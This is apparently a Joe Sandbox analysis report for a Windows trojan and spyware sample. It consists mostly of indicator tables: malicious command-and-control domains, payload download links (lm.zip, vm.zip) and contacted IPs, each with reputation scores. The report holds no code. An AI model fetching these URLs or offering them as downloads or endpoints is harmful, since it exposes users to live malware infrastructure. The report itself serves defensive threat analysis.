http://mzxn.ru/tmp/index.php	0%	Avira URL Cloud	safe
callosallsaospz.shop	100%	Avira URL Cloud	malware
http://100xmargin.com/tmp/index.php	0%	Virustotal		Browse
http://mzxn.ru/tmp/index.php	2%	Virustotal		Browse
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
callosallsaospz.shop	19%	Virustotal		Browse
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Virustotal		Browse
https://callosallsaospz.shop/api5	100%	Avira URL Cloud	malware
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api-	100%	Avira URL Cloud	malware
https://liernessfornicsa.shop:443/apiCLSID	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api1	100%	Avira URL Cloud	malware
liernessfornicsa.shop	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api1	16%	Virustotal		Browse
https://rentry.co	0%	Avira URL Cloud	safe
liernessfornicsa.shop	19%	Virustotal		Browse
http://www.oberhumer.com	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api-	15%	Virustotal		Browse
https://wns.windows.com/L	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/d3	100%	Avira URL Cloud	malware
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://store4.gofile.io	0%	Avira URL Cloud	safe
https://107.173.160.139/	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Avira URL Cloud	safe
https://store4.gofile.io	0%	Virustotal		Browse
https://liernessfornicsa.shop/api_	0%	Avira URL Cloud	safe
https://107.173.160.139/	3%	Virustotal		Browse
https://liernessfornicsa.shop/t	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
http://www.oberhumer.com	0%	Virustotal		Browse
https://rentry.co	1%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/api_	16%	Virustotal		Browse
shepherdlyopzc.shop	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://wns.windows.com/L	0%	Virustotal		Browse
upknittsoappz.shop	0%	Avira URL Cloud	safe
shepherdlyopzc.shop	19%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
funrecipebooks.com	162.0.235.84	true	true	1%, Virustotal, Browse	unknown
store4.gofile.io	31.14.70.245	true	false	0%, Virustotal, Browse	unknown
rentry.co	104.26.2.16	true	true	1%, Virustotal, Browse	unknown
mzxn.ru	186.145.236.93	true	true	2%, Virustotal, Browse	unknown
liernessfornicsa.shop	172.67.213.85	true	true	19%, Virustotal, Browse	unknown
mussangroup.com	185.149.100.242	true	true	14%, Virustotal, Browse	unknown
callosallsaospz.shop	188.114.97.3	true	true	19%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://100xmargin.com/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://olinsw.ws/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mzxn.ru/tmp/index.php	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
callosallsaospz.shop	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
liernessfornicsa.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://107.173.160.139/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
shepherdlyopzc.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mussangroup.com/wp-content/images/pic1.jpg	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
unseaffarignsk.shop	true	22%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/api	false	Avira URL Cloud: malware	unknown
http://wgdnb4rc.xyz/tmp/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://liernessfornicsa.shop/)	lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/apiple-sto:s	BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003377000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/ly3$	BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/E	lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/api5	BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003377000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/api-	BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://liernessfornicsa.shop:443/apiCLSID	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1701590540.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/api1	BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.urwpp.deDPlease	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2D42.exe, 0000000A.00000002.2754935748.000001E002291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B8F61000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4110836467.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rentry.co	2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.oberhumer.com	8EC7.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1701590540.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9BA3C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/d3	BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store4.gofile.io	powershell.exe, 0000000E.00000002.2659328365.000001B9BA61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 0000000E.00000002.2659328365.000001B9BA954000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/api_	lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/t	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2570920749.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653936321.0000000003165000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2657215472.0000000003165000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop:443/api	BitLockerToGo.exe, 00000010.00000003.2718921758.00000000054AF000.00000004.00000800.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/N	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.microsof	BitLockerToGo.exe, 00000010.00000003.2570920749.0000000005500000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/T	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://liernessfornicsa.shop/V	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054D2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2655706215.0000000003141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/a	lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/	BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/f	lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/apidows	BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers?	2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.221.157.163	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	true
107.173.160.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.160.137	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.213.85	liernessfornicsa.shop	United States	13335	CLOUDFLARENETUS	true
162.0.235.84	funrecipebooks.com	Canada	22612	NAMECHEAP-NETUS	true
109.172.114.212	unknown	Russian Federation	41691	SUMTEL-AS-RIPEMoscowRussiaRU	true
64.190.113.113	unknown	United States	26646	TRAVELCLICKCORP1US	true
94.156.79.190	unknown	Bulgaria	43561	NET1-ASBG	true
186.145.236.93	mzxn.ru	Colombia	14080	TelmexColombiaSACO	true
188.114.97.3	callosallsaospz.shop	European Union	13335	CLOUDFLARENETUS	true
104.26.2.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
167.235.128.153	unknown	United States	3525	ALBERTSONSUS	true
193.222.96.24	unknown	Germany	3303	SWISSCOMSwisscomSwitzerlandLtdCH	true
154.144.253.197	unknown	Morocco	6713	IAM-ASMA	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483387
Start date and time:	2024-07-27 07:42:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@40/44@12/16
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 80% Number of executed functions: 27 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EF14.exe, PID 3868 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1904 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
